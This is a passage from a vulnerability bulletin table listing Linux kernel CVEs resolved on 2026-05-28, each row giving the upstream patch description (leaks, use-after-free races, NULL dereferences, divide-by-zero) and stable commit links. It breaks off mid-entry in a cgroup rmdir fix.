| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: riscv: kvm: fix vector context allocation leak When the second kzalloc (host_context.vector.datap) fails in kvm_riscv_vcpu_alloc_vector_context, the first allocation (guest_context.vector.datap) is leaked. Free it before returning. | 2026-05-28 | not yet calculated | CVE-2026-46171 | https://git.kernel.org/stable/c/bd62c0f61bc722a097417401030c596cea8e21aa https://git.kernel.org/stable/c/1d57ab45ec5c0e22789de793bcf2a31ad6fb7d98 https://git.kernel.org/stable/c/b7c958d7c1eb1cb9b2be7b5ee4129fcd66cec978 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: xfrm6: release dst on error in xfrm6_rcv_encap() xfrm6_rcv_encap() performs an IPv6 route lookup when the skb does not already have a dst attached. ip6_route_input_lookup() returns a referenced dst entry even when the lookup resolves to an error route. If dst->error is set, xfrm6_rcv_encap() drops the skb without attaching the dst to the skb and without releasing the reference returned by the lookup. Repeated packets hitting this path therefore leak dst entries. Release the dst before jumping to the drop path. | 2026-05-28 | not yet calculated | CVE-2026-46172 | https://git.kernel.org/stable/c/c2efc4956981066df2fef1cc77391b523db6d8e4 https://git.kernel.org/stable/c/554c9b090c8ac5b1c5c507f4badf8d5d0c9c6e13 https://git.kernel.org/stable/c/9d5047782f9bd2829e529df69209bf3232eb561f https://git.kernel.org/stable/c/6a5eec0a2a0e99ec9743cf8f1c4082178811d90a https://git.kernel.org/stable/c/bc0fcb9823cd0894934cf968b525c575833d7078 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: SOF: Don't allow pointer operations on unconfigured streams When reporting the pointer for a compressed stream we report the current I/O frame position by dividing the position by the number of channels multiplied by the number of container bytes. These values default to 0 and are only configured as part of setting the stream parameters so this allows a divide by zero to be configured. Validate that they are non-zero, returning an error if not. | 2026-05-28 | not yet calculated | CVE-2026-46179 | https://git.kernel.org/stable/c/327a64241f30c74b6f35537eb9e1fc6c3cbe060b https://git.kernel.org/stable/c/98ed1383f597f8a45b6cb816bb20b96d46eeceda https://git.kernel.org/stable/c/0f0c0c1397a42aacaacae828206ee1b921623952 https://git.kernel.org/stable/c/4f42dd01f5217465f23a763e27b3984e114d0972 https://git.kernel.org/stable/c/c5b6285aae050ff1c3ea824ca3d88ac4be1e69c8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: brcmfmac: Fix potential use-after-free issue when stopping watchdog task Watchdog task might end between send_sig() and kthread_stop() calls, which results in the use-after-free issue. Fix this by increasing watchdog task reference count before calling send_sig() and dropping it by switching to kthread_stop_put(). | 2026-05-28 | not yet calculated | CVE-2026-46180 | https://git.kernel.org/stable/c/ed4168d1a50fef5be8eca947fbbf05a28507d265 https://git.kernel.org/stable/c/d16827cb1d3936f7627d0da6044483f743ebde03 https://git.kernel.org/stable/c/658d2e46c2e9a8eb9b80c5e803ce3c89885b3366 https://git.kernel.org/stable/c/908b92231e1ded53e43fcfad5e0704d83e1b803c https://git.kernel.org/stable/c/c623b63580880cc742255eaed3d79804c1b91143 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pseries/papr-hvpipe: Prevent kernel stack memory leak to userspace The hdr variable is allocated on the stack and only hdr.version and hdr.flags are initialized explicitly. Because the struct papr_hvpipe_hdr contains reserved padding bytes (reserved[3] and reserved2[40]), these could leak the uninitialized bytes to userspace after copy_to_user(). This patch fixes that by initializing the whole struct to 0. | 2026-05-28 | not yet calculated | CVE-2026-46182 | https://git.kernel.org/stable/c/0479b6e9f999cc1cbad7d9f09f574fc387e605d5 https://git.kernel.org/stable/c/f88f8e4485b437e0a2f96a7ff1f88aa22d925659 https://git.kernel.org/stable/c/cefeed44296261173a806bef988b26bc565da4be |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/sysfs-schemes: protect path kfree() with damon_sysfs_lock damon_sysfs_quot_goal->path can be read and written by users, via DAMON sysfs 'path' file. It can also be indirectly read, for the parameters {on,off}line committing to DAMON. The reads for parameters committing are protected by damon_sysfs_lock to avoid the sysfs files being destroyed while any of the parameters are being read. But the user-driven direct reads and writes are not protected by any lock, while the write is deallocating the path-pointing buffer. As a result, the readers could read the already freed buffer (use-after-free). Note that the user-reads don't race when the same open file is used by the writer, due to kernfs's open file locking. Nonetheless, doing the reads and writes with separate open files would be common. Fix it by protecting both the user-direct reads and writes with damon_sysfs_lock. | 2026-05-28 | not yet calculated | CVE-2026-46183 | https://git.kernel.org/stable/c/a34ca3e33da4b924c66bcca3729bf68ec5936910 https://git.kernel.org/stable/c/cf3b71421ca00807328c6d9cd242f9de3b77a4bf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sound: ua101: fix division by zero at probe Add a missing sanity check for bNrChannels in detect_usb_format() to prevent a division by zero in playback_urb_complete() and capture_urb_complete(). USB core does not validate class-specific descriptor fields such as bNrChannels, so drivers must verify them before use. If a device provides bNrChannels = 0, frame_bytes becomes zero and is later used as a divisor in the URB completion handlers, leading to a kernel crash. | 2026-05-28 | not yet calculated | CVE-2026-46184 | https://git.kernel.org/stable/c/6162e8212e88c39492d981b248b5e37002486c66 https://git.kernel.org/stable/c/593dd7e6c890d8e4ca21b3e2f796b7cb8e8da983 https://git.kernel.org/stable/c/0ff2b713f406e9ecadb406014d74e7a020ac12b1 https://git.kernel.org/stable/c/f1862dbf09080254c52175a448290c784dd7d3de https://git.kernel.org/stable/c/d1f73f169c1014463b5060e3f60813e13ddc7b87 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: virtio_bt: validate rx pkt_type header length virtbt_rx_handle() reads the leading pkt_type byte from the RX skb and forwards the remainder to hci_recv_frame() for every event/ACL/SCO/ISO type, without checking that the remaining payload is at least the fixed HCI header for that type. After the preceding patch bounds the backend-supplied used.len to [1, VIRTBT_RX_BUF_SIZE], a one-byte completion still reaches hci_recv_frame() with skb->len already pulled to 0. If the byte happened to be HCI_ACLDATA_PKT, the ACL-vs-ISO classification fast-path in hci_dev_classify_pkt_type() dereferences hci_acl_hdr(skb)->handle whenever the HCI device has an active CIS_LINK, BIS_LINK, or PA_LINK connection, reading two bytes of uninitialized RX-buffer data. The same hazard exists for every packet type the driver accepts because none of the switch cases in virtbt_rx_handle() check skb->len against the per-type minimum HCI header size before handing the frame to the core. After stripping pkt_type, require skb->len to cover the fixed header size for the selected type (event 2, ACL 4, SCO 3, ISO 4) before calling hci_recv_frame(); drop ratelimited otherwise. Unknown pkt_type values still take the original kfree_skb() default path. Use bt_dev_err_ratelimited() because both the length and pkt_type values come from an untrusted backend that can otherwise flood the kernel log. | 2026-05-28 | not yet calculated | CVE-2026-46186 | https://git.kernel.org/stable/c/1e1e509b6fd2a42421745bbcd98bd16daad20904 https://git.kernel.org/stable/c/2c1143564c71e7497b42d8360a8379ccbb011d3c https://git.kernel.org/stable/c/3485c7236c59c8c34a41af1c4b52982437554e79 https://git.kernel.org/stable/c/f743eab6486965f276c7e3f1700895f014fdc6db https://git.kernel.org/stable/c/daf23014e5d975e72ea9c02b5160d3fcf070ea47 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rsi: fix kthread lifetime race between self-exit and external-stop The RSI driver uses both self-exit (kthread_complete_and_exit) and external-stop (kthread_stop) when killing a kthread. Generally, kthread_stop() is called first, and in this case, no particular issues occur. However, in rare instances where kthread_complete_and_exit() is called first and then kthread_stop() is called, a UAF occurs because the kthread object, which has already exited and been freed, is accessed again. Therefore, to prevent this with minimal modification, you must remove kthread_stop() and change the code to wait until the self-exit operation is completed. | 2026-05-28 | not yet calculated | CVE-2026-46187 | https://git.kernel.org/stable/c/95fcb436586dc3c2983537d557ac05bbc6a027f3 https://git.kernel.org/stable/c/16d9f674c619838bdeae42abc0929c9c5477ea1f https://git.kernel.org/stable/c/4f9a4ae8d2c198f01611ea376034c326ef43ab56 https://git.kernel.org/stable/c/4f4c9b13c485abd0a2d2c97f9db339d1dd8e147f https://git.kernel.org/stable/c/db57a1aa54ff68669781976e4edb045e09e2b65b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: octeon_ep_vf: add NULL check for napi_build_skb() napi_build_skb() can return NULL on allocation failure. In __octep_vf_oq_process_rx(), the result is used directly without a NULL check in both the single-buffer and multi-fragment paths, leading to a NULL pointer dereference. Add NULL checks after both napi_build_skb() calls, properly advancing descriptors and consuming remaining fragments on failure. | 2026-05-28 | not yet calculated | CVE-2026-46188 | https://git.kernel.org/stable/c/60246cdd4c515ea7d920cddf48932efcb990773e https://git.kernel.org/stable/c/b0f4711b426a06fb4c4be85c36b9f5588d5140d3 https://git.kernel.org/stable/c/6fef6640bbf360e254cc0174365ed30ce3a07572 https://git.kernel.org/stable/c/dd66b42854705e4e4ee7f14d260f86c578bed3e3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/vmw_pvrdma: Fix double free on pvrdma_alloc_ucontext() error path Sashiko points out that pvrdma_uar_free() is already called within pvrdma_dealloc_ucontext(), so calling it before triggers a double free. | 2026-05-28 | not yet calculated | CVE-2026-46189 | https://git.kernel.org/stable/c/ecc36a82ecfcfdf3c6606d209f22ec5543c410e0 https://git.kernel.org/stable/c/45d25e3ec17900bf5a9d6876ff16ceee31c4c0e0 https://git.kernel.org/stable/c/0c63333ff97bd1275294fd12840a0efe9d7a4c59 https://git.kernel.org/stable/c/935ee27d0904aa944cbcc979094c20e5ef62eead https://git.kernel.org/stable/c/e38e86995df27f1f854063dab1f0c6a513db3faf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbcon: Avoid OOB font access if console rotation fails Clear the font buffer if the reallocation during console rotation fails in fbcon_rotate_font(). The putcs implementations for the rotated buffer will return early in this case. See [1] for an example. Currently, fbcon_rotate_font() keeps the old buffer, which is too small for the rotated font. Printing to the rotated console with a high-enough character code will overflow the font buffer. v2: - fix typos in commit message | 2026-05-28 | not yet calculated | CVE-2026-46191 | https://git.kernel.org/stable/c/594973a2e54924d8ba31c9faac669fc1ba6fcb80 https://git.kernel.org/stable/c/ab6c34b9829d5de03f1d08a47a2253729a6e7e27 https://git.kernel.org/stable/c/7105d9f1387d63b15c9a860674fc92c959181f2f https://git.kernel.org/stable/c/b44cc78ff46b96e72d333a3be6aaaa0a14797263 https://git.kernel.org/stable/c/e4ef723d8975a2694cc90733a6b888a5e2841842 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: microchip-core-qspi: don't attempt to transmit during emulated read-only dual/quad operations The core will deal with reads by creating clock cycles itself, there's no need to generate clock cycles by transmitting garbage data at the driver level. Further, transmitting garbage data just bricks the transfer since QSPI doesn't have a dedicated master-out line like MOSI in regular SPI. I'm not entirely sure if the transfer is bricked because of the garbage data being transmitted on the bus or because the core loses track of whether it is supposed to be sending or receiving data. | 2026-05-28 | not yet calculated | CVE-2026-46192 | https://git.kernel.org/stable/c/ec9d0ddbde6003c303fa5e1d5cd48952852984d8 https://git.kernel.org/stable/c/67184f361ab4d9fac6d2b8d5fed6649d496038a4 https://git.kernel.org/stable/c/eb56deaabf127e8985fc91fa6c97bf8a3b062844 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: ah: account for ESN high bits in async callbacks AH allocates its temporary auth/ICV layout differently when ESN is enabled: the async ahash setup appends a 4-byte seqhi slot before the ICV or auth_data area, but the async completion callbacks still reconstruct the temporary layout as if seqhi were absent. With an async AH implementation selected, that makes AH copy or compare the wrong bytes on both the IPv4 and IPv6 paths. In UML repro on IPv4 AH with ESN and forced async hmac(sha1), ping fails with 100% packet loss, and the callback logs show the pre-fix drift: ah4 output_done: esn=1 err=0 icv_off=20 expected_off=24 ah4 input_done: esn=1 auth_off=20 expected_auth_off=24 icv_off=32 expected_icv_off=36 Reconstruct the callback-side layout the same way the setup path built it by skipping the ESN seqhi slot before locating the saved auth_data or ICV. Per RFC 4302, the ESN high-order 32 bits participate in the AH ICV computation, so the async callbacks must account for the seqhi slot. Post-fix, the same IPv4 AH+ESN+forced-async-hmac(sha1) UML repro shows the corrected offset (ah4 output_done: esn=1 err=0 icv_off=24 expected_off=24) and ping succeeds; net/ipv4/ah4.o and net/ipv6/ah6.o build clean at W=1. IPv6 AH+ESN was not exercised at runtime, and the change has not been tested against a real async hardware AH engine. | 2026-05-28 | not yet calculated | CVE-2026-46193 | https://git.kernel.org/stable/c/0555d4f526232b3c9e3afbcd490c0c0793aefec6 https://git.kernel.org/stable/c/729899a2aa8bda7844be0cdcd3b470f11b912eda https://git.kernel.org/stable/c/7db99a09b3bc87268287bc7ab5f2e7f382b5ad87 https://git.kernel.org/stable/c/2ffaa7a94f9a4d22724364a1821735a0231d9f8d https://git.kernel.org/stable/c/ec54093e6a8f87e800bb6aa15eb7fc1e33faa524 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix node_cnt race between extent node destroy and writeback f2fs_destroy_extent_node() does not set FI_NO_EXTENT before clearing extent nodes. When called from f2fs_drop_inode() with I_SYNC set, concurrent kworker writeback can insert new extent nodes into the same extent tree, racing with the destroy and triggering f2fs_bug_on() in __destroy_extent_node(). The scenario is as follows: drop inode writeback - iput - f2fs_drop_inode // I_SYNC set - f2fs_destroy_extent_node - __destroy_extent_node - while (node_cnt) { write_lock(&et->lock) __free_extent_tree write_unlock(&et->lock) - __writeback_single_inode - f2fs_outplace_write_data - f2fs_update_read_extent_cache - __update_extent_tree_range // FI_NO_EXTENT not set, // insert new extent node } // node_cnt == 0, exit while - f2fs_bug_on(node_cnt) // node_cnt > 0 Additionally, __update_extent_tree_range() only checks FI_NO_EXTENT for EX_READ type, leaving EX_BLOCK_AGE updates completely unprotected. This patch sets FI_NO_EXTENT under et->lock in __destroy_extent_node(), consistent with other callers (__update_extent_tree_range and __drop_extent_tree), and checks FI_NO_EXTENT for both the EX_READ and EX_BLOCK_AGE trees. | 2026-05-28 | not yet calculated | CVE-2026-46194 | https://git.kernel.org/stable/c/42dd1c91f993431d0b399502479d00e6ad1bca71 https://git.kernel.org/stable/c/ab1eaf9d5c99042f5b0243bf67a06283a4c0757f https://git.kernel.org/stable/c/b0e4395870eb3441ddc959f6710b5f6ca61aff26 https://git.kernel.org/stable/c/0559a0e962aacbb47519e26ee663be04b72dcb92 https://git.kernel.org/stable/c/ed78aeebef05212ef7dca93bd931e4eff67c113f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tracepoint: balance regfunc() on func_add() failure in tracepoint_add_func() When a tracepoint goes through the 0 -> 1 transition, tracepoint_add_func() invokes the subsystem's ext->regfunc() before attempting to install the new probe via func_add(). If func_add() then fails (for example, when allocate_probes() cannot allocate a new probe array under memory pressure and returns -ENOMEM), the function returns the error without calling the matching ext->unregfunc(), leaving the side effects of regfunc() behind with no installed probe to justify them. For syscall tracepoints this is particularly unpleasant: syscall_regfunc() bumps sys_tracepoint_refcount and sets SYSCALL_TRACEPOINT on every task. After a leaked failure, the refcount is stuck at a non-zero value with no consumer, and every task continues paying the syscall trace entry/exit overhead until reboot. Other subsystems providing regfunc()/unregfunc() pairs exhibit similarly scoped persistent state. Mirror the existing 1 -> 0 cleanup and call ext->unregfunc() in the func_add() error path, gated on the same condition used there so the unwind is symmetric with the registration. | 2026-05-28 | not yet calculated | CVE-2026-46196 | https://git.kernel.org/stable/c/247ed8a969f981bfba3112fd4bb441eaa6cef59c https://git.kernel.org/stable/c/7bcadb3c2bc1cf60690e931aadd35fb7bd646a49 https://git.kernel.org/stable/c/2c5b8eeea006eb694c81631cd5713d494b80be90 https://git.kernel.org/stable/c/342829e042ac00f3d68d442ea92873fb6683f494 https://git.kernel.org/stable/c/fad217e16fded7f3c09f8637b0f6a224d58b5f2e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: mpc52xx: fix controller deregistration Make sure to deregister the controller before disabling and releasing underlying resources like interrupts and gpios during driver unbind. | 2026-05-28 | not yet calculated | CVE-2026-46200 | https://git.kernel.org/stable/c/a3669f678d0ee8b686d3eea4c0ed9817c9374945 https://git.kernel.org/stable/c/28f28a0f4e327f792c230493a0ea00389ff68ff5 https://git.kernel.org/stable/c/7fea80d93bfd34051b2ac1cec07766c87d8d28be https://git.kernel.org/stable/c/0f997fdae819a8c2cc83bd4ff7d935ad76c727c9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: appletb-kbd: run inactivity autodim from workqueues The autodim code in hid-appletb-kbd takes backlight_device->ops_lock via backlight_device_set_brightness() -> mutex_lock() from two different atomic contexts: * appletb_inactivity_timer() is a struct timer_list callback, so it runs in softirq context. Every expiry triggers BUG: sleeping function called from invalid context at kernel/locking/mutex.c:591 Call Trace: <IRQ> __might_resched __mutex_lock backlight_device_set_brightness appletb_inactivity_timer call_timer_fn run_timer_softirq * reset_inactivity_timer() is called from appletb_kbd_hid_event() and appletb_kbd_inp_event(). On real USB hardware these run in softirq/IRQ context (URB completion and input-event dispatch). When the Touch Bar has already been dimmed or turned off, the reset path calls backlight_device_set_brightness() directly to restore brightness, producing the same warning. Both call sites hit the same mutex_lock()-from-atomic bug. Fix them together by moving the blocking work onto the system workqueue: * Convert the inactivity timer from struct timer_list to struct delayed_work; the callback (appletb_inactivity_work) now runs in process context where mutex_lock() is legal. * Add a dedicated struct work_struct restore_brightness_work and have reset_inactivity_timer() schedule it instead of calling backlight_device_set_brightness() directly. Cancel both works synchronously during driver tear-down alongside the existing backlight reference drop. The semantics are unchanged (same delays, same state transitions on dim, turn-off and user activity); only the execution context of the sleeping call changes. The timer field and callback are renamed to match their new type; reset_inactivity_timer() keeps its name because it is invoked from input event paths that read naturally as "reset the inactivity timer". | 2026-05-28 | not yet calculated | CVE-2026-46202 | https://git.kernel.org/stable/c/5c0830323689ef15224f0025276176988861b3b0 https://git.kernel.org/stable/c/2473a334c292af257ef68e33bc7760f4a8251812 https://git.kernel.org/stable/c/1654e53349d4e657b331de354313461f401f5063 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: cadence-quadspi: fix unclocked access on unbind Make sure that the controller is runtime resumed before disabling it during driver unbind to avoid an unclocked register access. This issue was flagged by Sashiko when reviewing a controller deregistration fix. | 2026-05-28 | not yet calculated | CVE-2026-46203 | https://git.kernel.org/stable/c/d67a5311818b3e6481a1e4293c9337ebfee73111 https://git.kernel.org/stable/c/233db2cb14db8b1935dda52a6affd97276462b82 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vsock/virtio: fix empty payload in tap skb for non-linear buffers For non-linear skbs, virtio_transport_build_skb() goes through virtio_transport_copy_nonlinear_skb() to copy the original payload in the new skb to be delivered to the vsockmon tap device. This manually initializes an iov_iter but does not set iov_iter.count. Since the iov_iter is zero-initialized, the copy length is zero and no payload is actually copied to the monitor interface, leaving data un-initialized. Fix this by removing the linear vs non-linear split and using skb_copy_datagram_iter() with iov_iter_kvec() for all cases, as vhost-vsock already does. This handles both linear and non-linear skbs, properly initializes the iov_iter, and removes the now unused virtio_transport_copy_nonlinear_skb(). While touching this code, let's also check the return value of skb_copy_datagram_iter(), even though it's unlikely to fail. | 2026-05-28 | not yet calculated | CVE-2026-46207 | https://git.kernel.org/stable/c/06747f52ab157591cec7e5623a759473b66ef6f6 https://git.kernel.org/stable/c/52da6a74ca3de0fcda60301096b71534b3b18641 https://git.kernel.org/stable/c/378b131a25bd1a5ee27ca199fe486c299d5350c5 https://git.kernel.org/stable/c/3a3e3d90cbc79600544536723911657730759af3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/gem: fix error handling in msm_ioctl_gem_info_get_metadata() msm_ioctl_gem_info_get_metadata() always returns 0 regardless of errors. When copy_to_user() fails or the user buffer is too small, the error code stored in ret is ignored because the function unconditionally returns 0. This causes userspace to believe the ioctl succeeded when it did not. Additionally, kmemdup() can return NULL on allocation failure, but the return value is not checked. This leads to a NULL pointer dereference in the subsequent copy_to_user() call. Add the missing NULL check for kmemdup() and return ret instead of 0. Note that the SET counterpart (msm_ioctl_gem_info_set_metadata) correctly returns ret. Patchwork: https://patchwork.freedesktop.org/patch/714478/ | 2026-05-28 | not yet calculated | CVE-2026-46211 | https://git.kernel.org/stable/c/697e1a9559f6962f999cc4c748c2ffffcc0a7a7a https://git.kernel.org/stable/c/c57c861956b89f2e2528e6384d51e2dedd915809 https://git.kernel.org/stable/c/b079e85c91f446f29e808d8291189e897f1884ff https://git.kernel.org/stable/c/47cbfe2608314b833ad61a65827d8fb363bc2d2d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: appletb-kbd: fix UAF in inactivity-timer cleanup path Commit 38224c472a03 ("HID: appletb-kbd: fix slab use-after-free bug in appletb_kbd_probe") added timer_delete_sync(&kbd->inactivity_timer) to both the probe close_hw error path and appletb_kbd_remove(), but the way it was wired in left the inactivity timer reachable during driver tear-down via two distinct windows. Window A -- put_device() before timer_delete_sync(): put_device(&kbd->backlight_dev->dev); timer_delete_sync(&kbd->inactivity_timer); The inactivity_timer softirq reads kbd->backlight_dev and calls backlight_device_set_brightness() -> mutex_lock(&ops_lock). If a concurrent hid_appletb_bl unbind drops the last devm reference between these two calls, the backlight_device is freed and the mutex_lock() touches freed memory. Window B -- backlight cleanup before hid_hw_stop(): if (kbd->backlight_dev) { timer_delete_sync(...); put_device(...); } hid_hw_close(hdev); hid_hw_stop(hdev); Even after Window A is closed, hid_hw_close()/hid_hw_stop() still run afterwards, so a late ".event" callback from the HID core (USB URB completion on real Apple hardware) can arrive after timer_delete_sync() drained the softirq but before put_device() drops the reference. That callback reaches reset_inactivity_timer(), which calls mod_timer() and re-arms the timer. The freshly re-armed timer can then fire on the about-to-be-freed backlight_device. Both windows produce the same KASAN slab-use-after-free: BUG: KASAN: slab-use-after-free in __mutex_lock+0x1aab/0x21c0 Read of size 8 at addr ffff88803ee9a108 by task swapper/0/0 Call Trace: <IRQ> __mutex_lock backlight_device_set_brightness appletb_inactivity_timer call_timer_fn run_timer_softirq handle_softirqs Allocated by task N: devm_backlight_device_register appletb_bl_probe Freed by task M: (concurrent hid_appletb_bl unbind path) Close both windows at once by reworking the tear-down in appletb_kbd_remove() and in the probe close_hw error path so that 1) hid_hw_close()/hid_hw_stop() run before the backlight cleanup, guaranteeing no further .event callback can fire and re-arm the timer, and 2) inside the "if (kbd->backlight_dev)" block, timer_delete_sync() runs before put_device(), so the softirq is drained before the final reference is dropped. | 2026-05-28 | not yet calculated | CVE-2026-46213 | https://git.kernel.org/stable/c/59a79938ca5541fe55d675304116b7ea684afef0 https://git.kernel.org/stable/c/93d989e47bc316c793a69c6a332e053c90e29f02 https://git.kernel.org/stable/c/4db2af929279c799b5653a39eb0795c72baffca4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vsock/virtio: fix accept queue count leak on transport mismatch virtio_transport_recv_listen() calls sk_acceptq_added() before vsock_assign_transport(). If vsock_assign_transport() fails or selects a different transport, the error path returns without calling sk_acceptq_removed(), permanently incrementing sk_ack_backlog. After approximately backlog+1 such failures, sk_acceptq_is_full() returns true, causing the listener to reject all new connections. Fix by moving sk_acceptq_added() to after the transport validation, matching the pattern used by vmci_transport and hyperv_transport. | 2026-05-28 | not yet calculated | CVE-2026-46214 | https://git.kernel.org/stable/c/65c484726e74013a2ec7ba67a34d87760ae8f390 https://git.kernel.org/stable/c/29371f3cc83e2a92265b4768014a30b80234112f https://git.kernel.org/stable/c/e9edf9893cf26d060705c910a9b62d8cc96ed56a https://git.kernel.org/stable/c/6d3275fc4ed968938e1d556c344798046776668d https://git.kernel.org/stable/c/52bcb57a4e8a0865a76c587c2451906342ae1b2d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/hdcp: Add NULL check for media_gt in intel_hdcp_gsc_check_status() When media GT is disabled via configfs, there is no allocation for media_gt, which is kept as NULL. In such a scenario, intel_hdcp_gsc_check_status() results in a kernel pagefault error due to gt->uc.gsc being evaluated as an invalid memory address. Fix that by introducing a NULL check on media_gt and bailing out early if so. While at it, also drop the NULL check for gsc, since it can't be NULL if media_gt is not NULL. v2: - Get address for gsc only after checking that gt is not NULL. (Shuicheng) - Drop the NULL check for gsc. (Shuicheng) v3: - Add "Fixes" and "Cc: <stable...>" tags. (Matt) (cherry picked from commit bfaf87e84ca3ca3f6e275f9ae56da47a8b55ffd1) | 2026-05-28 | not yet calculated | CVE-2026-46216 | https://git.kernel.org/stable/c/d8ab4b47edf4578dbfbe5e95817107a514fa34cc https://git.kernel.org/stable/c/60a1e131a811b68703da58fd805ab359b704ab03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/vcn4: Avoid overflow on msg bound check As pointed out by SDL, the previous condition may be vulnerable to overflow. (cherry picked from commit 3c5367d950140d4ec7af830b2268a5a6fdaa3885) | 2026-05-28 | not yet calculated | CVE-2026-46217 | https://git.kernel.org/stable/c/5bb5faff4837b1d98fd655cf8bd7b5d4da0fc4dc https://git.kernel.org/stable/c/73043d296787bf187d89ffb5c5dcf5bdc3db7885 https://git.kernel.org/stable/c/271cd5429513ff9b364a9bf8903e5b65b687eb25 https://git.kernel.org/stable/c/30d12ee310a6024ff4c7b9eafdbbeab2db450d4a https://git.kernel.org/stable/c/65bce27ea6192320448c30267ffc17ffa094e713 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: mpc52xx: fix use-after-free on unbind The state machine work is scheduled by the interrupt handler and therefore needs to be cancelled after disabling interrupts to avoid a potential use-after-free. | 2026-05-28 | not yet calculated | CVE-2026-46219 | https://git.kernel.org/stable/c/bb6b50f709c5a01906ff72a07fdc070bb3357188 https://git.kernel.org/stable/c/ee52da0dd83ebcd89ecbbe2660c57b15a25489f2 https://git.kernel.org/stable/c/6c3e413919a12627d04a31a4a5fccb9fc129bb02 https://git.kernel.org/stable/c/bbcd6dd8e9f264440eaf6167382bf404911c1c46 https://git.kernel.org/stable/c/706b3dc2ac7a998c55e14b3fd2e8f934c367e6e0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/sdma4: replace BUG_ON with WARN_ON in fence emission sdma_v4_0_ring_emit_fence() contains two BUG_ON(addr & 0x3) assertions that verify fence writeback addresses are dword-aligned. These assertions can be reached from unprivileged userspace via crafted DRM_IOCTL_AMDGPU_CS submissions, causing a fatal kernel panic in a scheduler worker thread. Replace both BUG_ON() calls with WARN_ON() to log the condition without crashing the kernel. A misaligned fence address at this point indicates a driver bug, but crashing the kernel is never the correct response when the assertion is reachable from userspace. The CS IOCTL path is the correct place to filter invalid submissions; the ring emission callback is too late to do anything about it. (cherry picked from commit b90250bd933afd1ba94d86d6b13821997b22b18e) | 2026-05-28 | not yet calculated | CVE-2026-46220 | https://git.kernel.org/stable/c/4f7ca00fa91daf0795ec6b3b130c5ebba1f155fe https://git.kernel.org/stable/c/d331fb241a4602253976ddd65144a8ba2b05665d https://git.kernel.org/stable/c/0b91ea46bb68abf98a082bf239092253bbd6aaa2 https://git.kernel.org/stable/c/a4fd82fb0757c180bf622907397c528b89a827b2 https://git.kernel.org/stable/c/78d2e624fa073c14970aa097adcf3ea31c157a66 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: EDAC/versalnet: Fix device name memory leak The device name allocated via kzalloc() in init_one_mc() is assigned to dev->init_name but never freed on the normal removal path. device_register() copies init_name and then sets dev->init_name to NULL, so the name pointer becomes unreachable from the device, thus leaking memory. Use a stack-local char array instead of using kzalloc() for name. | 2026-05-28 | not yet calculated | CVE-2026-46221 | https://git.kernel.org/stable/c/24d2912962d087ebff7c4984f8ac34a5f23c8dbf https://git.kernel.org/stable/c/b16033c8774f5fb4c0cb9b445a1dfc68f499ae6a https://git.kernel.org/stable/c/8cf5dd235eff6008cb04c3d8064d2acfa90616f1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: rockchip: rkcif: Add missing MUST_CONNECT flag to pads The pads missed checks for connected devices, which may cause a NULL dereference when the stream is enabled. Unable to handle kernel NULL pointer dereference at virtual address 0000000000000020 pc : rkcif_interface_enable_streams+0x48/0xf0 lr : rkcif_interface_enable_streams+0x44/0xf0 Call trace: rkcif_interface_enable_streams+0x48/0xf0 v4l2_subdev_enable_streams+0x26c/0x3f0 rkcif_stream_start_streaming+0x140/0x278 vb2_start_streaming+0x74/0x188 vb2_core_streamon+0xe0/0x1d8 vb2_ioctl_streamon+0x60/0xa8 v4l_streamon+0x2c/0x40 __video_do_ioctl+0x34c/0x400 video_usercopy+0x2d0/0x800 video_ioctl2+0x20/0x60 v4l2_ioctl+0x48/0x78 | 2026-05-28 | not yet calculated | CVE-2026-46222 | https://git.kernel.org/stable/c/318142640590342bfec7aa06d0bdcd0ddbf953d0 https://git.kernel.org/stable/c/8e3c751259dc2d1325838eff26f41032523c7b57 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cgroup: Defer css percpu_ref kill on rmdir until cgroup is depopulated A chain of commits going back to v7.0 reworked rmdir to satisfy the controller invariant that a subsystem's ->css_offline() must not run while tasks are still doing kernel-side work in the cgroup. [1] d245698d727a ("cgroup: Defer task cgroup unlink until after the task is done switching out") [2] a72f73c4dd9b ("cgroup: Don't expose dead tasks in cgroup") [3] 1b164b876c36 ("cgroup: Wait for dying tasks to leave on rmdir") [4] 4c56a8ac6869 ("cgroup: Fix cgroup_drain_dying() testing the wrong condition") [5] 13e786b64bd3 ("cgroup: Increment nr_dying_subsys_* from rmdir context") [1] moved task cset unlink from do_exit() to finish_task_switch() so a task's cset link drops only after the task has fully stopped scheduling. That made tasks past exit_signals() linger on cset->tasks until their final context switch, which led to a series of problems as what userspace expected to see after rmdir diverged from what the kernel needs to wait for. [2]-[5] tried to bridge that divergence: [2] filtered the exiting tasks from cgroup.procs; 